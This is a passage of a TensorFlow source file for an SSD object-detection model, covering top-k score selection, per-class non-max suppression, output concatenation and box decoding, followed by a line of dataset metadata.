top_k_scores, top_k_indices = tf.nn.top_k(
scores, k=pre_nms_num_detections, sorted=True)
top_k_scores = tf.reshape(top_k_scores,
[-1, num_class, pre_nms_num_detections])
top_k_indices = tf.reshape(top_k_indices,
[-1, num_class, pre_nms_num_detections])
return tf.transpose(top_k_scores, [0, 2, 1]), tf.transpose(
top_k_indices, [0, 2, 1])
def _filter_scores(scores, boxes, min_score=ssd_constants.MIN_SCORE):
mask = scores > min_score
scores = tf.where(mask, scores, tf.zeros_like(scores))
boxes = tf.where(
tf.tile(tf.expand_dims(mask, 2), (1, 1, 4)), boxes, tf.zeros_like(boxes))
return scores, boxes
def non_max_suppression(scores_in,
boxes_in,
top_k_indices,
source_id,
raw_shape,
num_detections=ssd_constants.MAX_NUM_EVAL_BOXES):
"""Implement Non-maximum suppression.
Args:
scores_in: a Tensor with shape [batch_size,
ssd_constants.MAX_NUM_EVAL_BOXES, num_classes]. The top
ssd_constants.MAX_NUM_EVAL_BOXES box scores for each class.
boxes_in: a Tensor with shape [batch_size, N, 4], which stacks box
regression outputs on all feature levels. The N is the number of total
anchors on all levels.
top_k_indices: a Tensor with shape [batch_size,
ssd_constants.MAX_NUM_EVAL_BOXES, num_classes]. The indices for these top
boxes for each class.
source_id: a Tensor with shape [batch_size]
raw_shape: a Tensor with shape [batch_size, 3]
num_detections: maximum output length.
Returns:
A tensor size of [batch_size, num_detections, 6] represents boxes, labels
and scores after NMS.
"""
_, _, num_classes = scores_in.get_shape().as_list()
source_id = tf.to_float(
tf.tile(tf.expand_dims(source_id, 1), [1, num_detections]))
raw_shape = tf.to_float(
tf.tile(tf.expand_dims(raw_shape, 1), [1, num_detections, 1]))
list_of_all_boxes = []
list_of_all_scores = []
list_of_all_classes = []
# Skip background class.
for class_i in range(1, num_classes, 1):
boxes = tf.batch_gather(boxes_in, top_k_indices[:, :, class_i])
class_i_scores = scores_in[:, :, class_i]
class_i_scores, boxes = _filter_scores(class_i_scores, boxes)
(class_i_post_scores,
class_i_post_boxes) = ssd_architecture.non_max_suppression_padded(
scores=tf.to_float(class_i_scores),
boxes=tf.to_float(boxes),
max_output_size=num_detections,
iou_threshold=ssd_constants.OVERLAP_CRITERIA)
class_i_classes = tf.fill(tf.shape(class_i_post_scores), class_i)
list_of_all_boxes.append(class_i_post_boxes)
list_of_all_scores.append(class_i_post_scores)
list_of_all_classes.append(class_i_classes)
post_nms_boxes = tf.concat(list_of_all_boxes, axis=1)
post_nms_scores = tf.concat(list_of_all_scores, axis=1)
post_nms_classes = tf.concat(list_of_all_classes, axis=1)
# sort all results.
post_nms_scores, sorted_indices = tf.nn.top_k(
tf.to_float(post_nms_scores), k=num_detections, sorted=True)
post_nms_boxes = tf.batch_gather(post_nms_boxes, sorted_indices)
post_nms_classes = tf.batch_gather(post_nms_classes, sorted_indices)
detections_result = tf.stack([
source_id,
post_nms_boxes[:, :, 0],
post_nms_boxes[:, :, 1],
post_nms_boxes[:, :, 2],
post_nms_boxes[:, :, 3],
post_nms_scores,
tf.to_float(post_nms_classes),
],
axis=2)
return detections_result
def concat_outputs(cls_outputs, box_outputs):
"""Concatenate predictions into a single tensor.
This function takes the dicts of class and box prediction tensors and
concatenates them into a single tensor for comparison with the ground truth
boxes and class labels.
Args:
cls_outputs: an OrderDict with keys representing levels and values
representing logits in [batch_size, height, width,
num_anchors * num_classses].
box_outputs: an OrderDict with keys representing levels and values
representing box regression targets in
[batch_size, height, width, num_anchors * 4].
Returns:
concatenanted cls_outputs with shape [batch_size, num_classes, N] and
concatenanted box_outputs with shape [batch_size, 4, N], where N is number
of anchors.
"""
assert set(cls_outputs.keys()) == set(box_outputs.keys())
# This sort matters. The labels assume a certain order based on
# ssd_constants.FEATURE_SIZES, and this sort matches that convention.
keys = sorted(cls_outputs.keys())
flat_cls = []
flat_box = []
for i, k in enumerate(keys):
# TODO(taylorrobie): confirm that this reshape, transpose,
# reshape is correct.
scale = ssd_constants.FEATURE_SIZES[i]
last_dim_size = scale * scale * ssd_constants.NUM_DEFAULTS[i]
split_shape = (ssd_constants.NUM_CLASSES, ssd_constants.NUM_DEFAULTS[i])
assert cls_outputs[k].shape[3] == split_shape[0] * split_shape[1]
flat_cls.append(
tf.reshape(
tf.transpose(cls_outputs[k], [0, 3, 1, 2]),
[-1, ssd_constants.NUM_CLASSES, last_dim_size]))
split_shape = (ssd_constants.NUM_DEFAULTS[i], 4)
assert box_outputs[k].shape[3] == split_shape[0] * split_shape[1]
flat_box.append(
tf.reshape(
tf.transpose(box_outputs[k], [0, 3, 1, 2]), [-1, 4, last_dim_size]))
return tf.concat(flat_cls, axis=2), tf.concat(flat_box, axis=2)
def _model_fn(images, source_id, raw_shape, params, model):
"""Model defination for the SSD model based on ResNet-50.
Args:
images: the input image tensor with shape [batch_size, height, width, 3].
The height and width are fixed and equal.
source_id: a Tensor with shape [batch_size]
raw_shape: a Tensor with shape [batch_size, 3]
params: the dictionary defines hyperparameters of model. The default
settings are in default_hparams function in this file.
model: the SSD model outputs class logits and box regression outputs.
Returns:
spec: the EstimatorSpec or TPUEstimatorSpec to run training, evaluation,
or prediction.
"""
features = images
def _model_outputs():
return model(features, params, is_training_bn=False)
if params['use_bfloat16']:
with bfloat16.bfloat16_scope():
cls_outputs, box_outputs = _model_outputs()
levels = cls_outputs.keys()
for level in levels:
cls_outputs[level] = tf.cast(cls_outputs[level], tf.float32)
box_outputs[level] = tf.cast(box_outputs[level], tf.float32)
else:
cls_outputs, box_outputs = _model_outputs()
levels = cls_outputs.keys()
flattened_cls, flattened_box = concat_outputs(cls_outputs, box_outputs)
y_min, x_min, y_max, x_max = tf.split(flattened_box, 4, axis=1)
flattened_box = tf.concat([x_min, y_min, x_max, y_max], axis=1)
# [batch_size, 4, N] to [batch_size, N, 4]
flattened_box = tf.transpose(flattened_box, [0, 2, 1])
anchors = tf.convert_to_tensor(DefaultBoxes()('ltrb'))
decoded_boxes = decode_boxes(
encoded_boxes=flattened_box,
anchors=anchors,
weights=ssd_constants.BOX_CODER_SCALES)
pred_scores = tf.nn.softmax(flattened_cls, axis=1)
pred_scores, indices = select_top_k_scores(pred_scores,
ssd_constants.MAX_NUM_EVAL_BOXES)
detections = non_max_suppression(
scores_in=pred_scores,
boxes_in=decoded_boxes,
top_k_indices=indices,
source_id=source_id,
raw_shape=raw_shape)
return detections
def ssd_model_fn(images, source_id, raw_shape, params):
"""SSD model."""
return _model_fn(
images, source_id, raw_shape, params, model=ssd_architecture.ssd)
def default_hparams():
return tf.contrib.training.HParams(
use_bfloat16=True,
transpose_input=True,
nms_on_tpu=True,
conv0_space_to_depth=False,
use_cocoeval_cc=True,
use_spatial_partitioning=False,
)
| apache-2.0 | 5,158,396,806,468,357,000 | 34.688946 | 80 | 0.649715 | false | 3.275065 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.